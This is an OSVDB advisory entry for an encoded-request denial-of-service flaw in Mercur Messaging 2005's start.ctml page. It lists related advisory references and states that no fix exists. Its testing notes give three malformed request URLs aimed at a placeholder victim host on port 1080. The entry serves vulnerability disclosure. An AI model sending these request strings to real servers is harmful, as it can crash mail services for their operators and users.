Mercur Messaging 2005 start.ctml Encoded Request DoS

2005-05-02T14:06:29
ID OSVDB:16219
Type osvdb
Reporter Dr_insane(dr_insane@pathfinder.gr)
Modified 2005-05-02T14:06:29

Description

Solution Description

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

Manual Testing Notes

http://[victim]:1080/start.ctml%20?Session.Id=[cookie] http://[victim]:1080/start.ctml%asd?Session.Id=[cookie] http://[victim]:1080/start.ctml%20?Session.Id=[cookie]

References:

Vendor URL: http://www.atrium-software.com/mercur/english/index.html Secunia Advisory ID:15234 Related OSVDB ID: 16224 Related OSVDB ID: 16218 Related OSVDB ID: 16220 Related OSVDB ID: 16225 Related OSVDB ID: 16222 Related OSVDB ID: 16221 Related OSVDB ID: 16223 Related OSVDB ID: 16226 Other Advisory URL: http://osvdb.org/ref/16/162xx-mercur_messaging.txt